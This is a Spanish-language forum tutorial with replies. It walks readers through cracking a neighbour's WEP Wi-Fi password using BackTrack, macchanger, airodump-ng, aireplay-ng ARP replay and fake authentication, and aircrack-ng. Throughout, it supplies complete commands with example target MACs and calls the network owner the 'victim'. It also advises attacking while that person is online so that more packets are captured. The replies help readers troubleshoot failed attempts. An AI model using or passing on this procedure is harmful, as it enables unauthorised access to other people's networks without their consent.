Crackear WEP con Intel Pro Wireless ABG3945 [Usando BackTrack]

Bueno les traigo este tutorial de DevilBoy, donde se utiliza la tarjeta Intel Pro Wireless ABG3945

Esta tarjeta es la que viene integrada en la mayoria de los notebook y es por eso es que se hizo este tutorial especialmente para esa tarjeta

Primero procedemos a bajar el BackTrack y a quemarlo (grabarlo)

DESCARGA

Les explicare el tutorial lo mas simple posible cabros y hacerlo mas chilensi XD

Primero que nada procederemos a cambiar el idioma, en la esquina inferior derecha veran una bandera, hacemos click derecho y le damos a configuracion y veran que saldran 2 listas, y en la del lado izquierda buscaran la bandera de España (para los que no saben cual es XD les dira SPAIN)

Ustedes se preguntaran porque hacemos esto... basicamente por el teclado ya que por ejemplo si usamos el de estados unidos, y vamos a la consola y apretamos el signo "=" , en la consola saldra otro caracter ya que esta con otro idioma

Una vez hecho eso, activaremos la tarjeta

Abrimos la consola (Es el icono de color negro que sale al lado inferior izquierdo) y colocamos los 2 siguientes comandos:

Insertar CODE, HTML o PHP:

rmmod iwl3945

Insertar CODE, HTML o PHP:

modprobe ipwraw

Veran que se les encendera la luz del wifi en el notebook (H)



Y para asegurarnos de que todo va bien colocar el comando

Insertar CODE, HTML o PHP:

IWCONFIG

Y deberia salir algo asi



Ahora procederemos a cambiar la direccion MAC (No se asusten, volvera a la normalidad... este paso es para engañar que tu tarjeta tiene la misma mac que el de la persona del internet, el vecino o nose quien chucha XD)

Para esto usamos este comando:

Insertar CODE, HTML o PHP:

macchanger -m 00:11:22:33:44:55 wifi0

Pueden colocar cualquier mac, pero les recomiendo esa nomas si lo mas simple posible para asi recordarla, ya que la utilizaremos despues



Una vez hecho todo esto, procederemos a detectar las redes wifi
Utilizando el siguiente comando:

Insertar CODE, HTML o PHP:

airodump-ng wifi0

Les deberia salir algo asi:



Ahora pasaremos a escanear la red que queremos crackear usando el siguiente comando:

Insertar CODE, HTML o PHP:

airodump-ng --channel [B][COLOR=Red]x[/COLOR][/B] --write [B][COLOR=Blue]xxx[/COLOR][/B] wifi0

* La "X" se reemplaza por el canal que tiene la red a crackear, lo pueden ver en donde escanearon, donde dice CH

* Las "XXX" vendria siendo el nombre que le daremos, pero escoger uno simple ya que al ultimo utilizaremos ese nombre

Ejemplo:

En este tutorial se crackeara la red WebSTAR21, y si revisamos veremos que tiene el canal (CH) numero 7 asi que quedaria algo asi:

Insertar CODE, HTML o PHP:

airodump-ng --channel [B][COLOR=Red]7[/COLOR][/B] --write [B][COLOR=Blue]portalnet[/COLOR][/B] wifi0

Y saldria algo asi:




Ahora procederemos a capturar los packetes, utilizando el siguiente comando:

Insertar CODE, HTML o PHP:

aireplay-ng -3 -b [B][COLOR=Red]xx:xx:xx:xx:xx:xx[/COLOR][/B] -h [B][COLOR=Blue]nuestra mac[/COLOR][/B] wifi0

* Reemplazamos las "X" por la Direccion MAC de la red, en este caso de la red WebSTAR21

* En donde esta lo azul colocaremos nuestra MAC que "inventamos" al principio del tutorial

Quedaria algo asi:

Insertar CODE, HTML o PHP:

aireplay-ng -3 -b [B][COLOR=Red]00:1D:60:37:05:99[/COLOR][/B] -h [B][COLOR=Blue]00:11:22:33:44:55[/COLOR][/B] wifi0

Ahora procederemos a asociarnos con el router de la victima, usando el siguiente comando:

Insertar CODE, HTML o PHP:

aireplay-ng -1 0 -e [COLOR=DarkOrange][B]Nombre de la red[/B][/COLOR] -a [B][COLOR=Red]xx:xx:xx:xx:xx:xx[/COLOR][/B] -h [B][COLOR=Blue]nuestra mac[/COLOR][/B] wifi0

* En "nombre de la red" debemos colocar el nombre EXACTO de la red victima, en este caso es WebSTAR21

* En las "X" colocaremos nuevamente la Direccion MAC de la victima

* Colocaremos "nuestra mac" nuevamente, que es la que creamos

En nuestro caso quedo asi:

Insertar CODE, HTML o PHP:

aireplay-ng -1 0 -e [COLOR=DarkOrange][B]WebSTAR21[/B][/COLOR] -a [COLOR=Red][B]00:1D:60:37:05:99[/B][/COLOR] -h [B][COLOR=Blue]00:11:22:33:44:55[/COLOR][/B] wifi0

Ahora comenzara a captar los packetes



Veran que ira aumentando con el pasar de los minutos, lo recomendable son unos 60000 ARP, puede que se demore unos 5 minutos o mas todo dependera del alcanze de la red y todo


En este tutorial llegamos a una cantidad de 60749 ARP y en el cual prodecederemos a terminar finalizando con la capturacion de packetes con las teclas [CONTROL + C] , si todo salio bien les deberia salir asi



Finalizamos todo esto con el crackeo usando el siguiente comando:

Insertar CODE, HTML o PHP:

aircrack-ng [COLOR=Blue][B]nombre que eligieron al principio[/B][/COLOR][B][COLOR=SeaGreen]-01.cap[/COLOR][/B]

Si recuerdan o revisan el tutorial les dije que utilizariamos el nombre que le dariamos a la red, en el caso de nosotros habiamos escogido el nombre de "portalnet" y lo de "-01.cap" se le agrega, ahora si repetimos todos los pasos y usamos el mismo nombre se creara el -02.cap pero evitemos usar el mismo nombre 2 veces (en la misma sesion, ya que al reiniciar el note, se borraran )

En nuestro caso quedo asi todo:

Insertar CODE, HTML o PHP:

aircrack-ng [COLOR=Blue][B]portalnet[/B][/COLOR]-01.cap

Y les saldra todas las redes, les saldria esto donde tendran que escoger la red con la que hicieron todos los pasos



Ahi escogen dependiendo de que numero les salga en el lado izquierdo en el simbolo "#", en nuestro caso seria el numero 1, lo colocamos y walaaaaa!!





OBTUVIMOS LA CLAVE!!!

KEY FOUND: 00:07:20:37:01


Obviamente despues cuando vayan a conectarse a la red, tienen que colocarla sin los doble punto

Ejemplo: 0007203701

*DATO IMPORTANTE* Pueden repetir el paso anterior y seleccionar otra red para crackearla, usando el mismo .CAP para asi no tener que repetir todos los pasos y crackear las otras (Tienen que ser con clave WEP recuerden)

* Hagan esto en un horario normal, cuando ustedes piensen que la otra persona esta usando el internet, ya que si no lo esta usando, lo mas probable es que no capte muchos packetes y asi no podra decifrar la clave

ALGO MUY IMPORTANTE! UNA VEZ QUE YA HAYAN HECHO TODO, APAGEN EL NOTEBOOK Y DEJENLO UN RATO DESCANSAR, YA QUE SI LO INICIA ALTIRO SE LES PEGARA. SE PREGUNTARAN PORQUE... LO QUE PASA ES QUE DIGAMOS QUE AL CRACKEAR ESTAMOS USANDO MAS FUERZA DE LO NORMAL DIGAMOS DE UNA FORMA (LO NOTARAN PORQUE EL NOTEBOOK DURANTE TODO EL PROCESO SONARA COMO UN REFRIGERADOR XD)

UNOS 3 O 5 MINUTOS DEJANDOLO DESCANSAR ESTA BUENO

Y obviamente no se olviden de anotar la clave en un cuaderno o algo XD

Espero que les haya gustado cabros tutorial "modificado" o digamos adaptado de una forma mas entendible.

Esta comprobado por mi, estuve mil años buscando si se podia crackear con esta tarjeta hasta que encontre el tutorial XD y funciona 100%

Tutorial Hecho por: DevilBoy
Tutorial Adaptador por: UnknownCnR

 

Pero a que te refieres con que te saca?

Y eso que dices de error, mira hay veces que en ese paso dice que el ataque no se pudo hacer satisfactoriamente (antes del paso de crackear) pero no hay que pescar mucho porque despues igual podras crackearlo

y estas seguro de hacer todo perfecto? porque el mas minimo detalle te jodera la wea.. y tambien fijarte si es WEP o no WPA

PD: Si puedes colocar un screenshot del error seria ideal

 

a dale

Pero en todo caso es lo mismo que en el tutorial

rmmod iwl3945
modprobe ipwraw

y al hacer el comando IWCONFIG
si te fijas sale

Mode:Monitor

En todo caso los que no les funciona de mi modo, lo hagan con el que tu acabas de colocar

 

Cuando te salga ese mensaje no lo tomes en cuenta ni cierres nada, porque cuando te sale eso es cuando va todo bien

Ahora.. puede que te pase lo mismo que a varios.. que solo puedes cargar la tarjeta una sola vez.. y realizado un crackeo no puedes hacer otro a menos que reinicies la maquina..

y tambien tienes que fijarte en hacer TODO perfecto.. un minimo detalle que se te vaya.. y sale todo mal

Fijate bien en los comandos, canales y verifica bien el nombre con el que quedo el archivo de paquetes (vas a la HOME y te saldra el archivo .cap)


Trata de hacerlo sin equivocarte.. si te equivocas, reinicia el pc e inicia de nuevo el backtrack porque yo siempre que eh tratado de hacerlo por 2da vez o mas en una misma "sesion" digamos... no me funciona

y frena los packetes cuando lleves unos 60.000 haciendolo con la tecla CONTROL + C
y ahi esperas a que termine de salir eso de OPEN SYSTEM
te saldra attacked unsussefull no pesques, porque despues igual podras crackearlo, obviamente teniendo los packetes necesarios

 

Te recomiendo que lo bajes usando un Gestor de Descargas como Internet Download Manager, FlashGet, o algun otro ya que si se llega a cortar la descarga, podras renaudar las descargas desde el punto donde quedo y no tener que bajarlo de nuevo

Mira aqui estan todas las tarjetas compatibles con BackTrack

http://backtrack.offensive-security.com/index.php/HCL:Wireless

Si se encuentra la tuya, en el siguiente link

http://backtrack.offensive-security.com/index.php/HCL:Wireless#Dlink_DWA-520

Lo que deberias cambiar, la forma de cargar los drivers... pero no cacho como sera en la tuya... en mi caso eran los comandos rmmod iwl3945 y modprobe ipwraw, pero prueba colocando madwifi-ng en la consola de BackTrack y ahi te saldran varios comandos y sus respectivas ayudas pero de que si sirve para crackear, si Pero como te dije, solo cambia la forma de cargar los drivers (vienen integrados en el BackTrack), ya que los demas comandos son de los programas por ende siempre funcionaran iguales.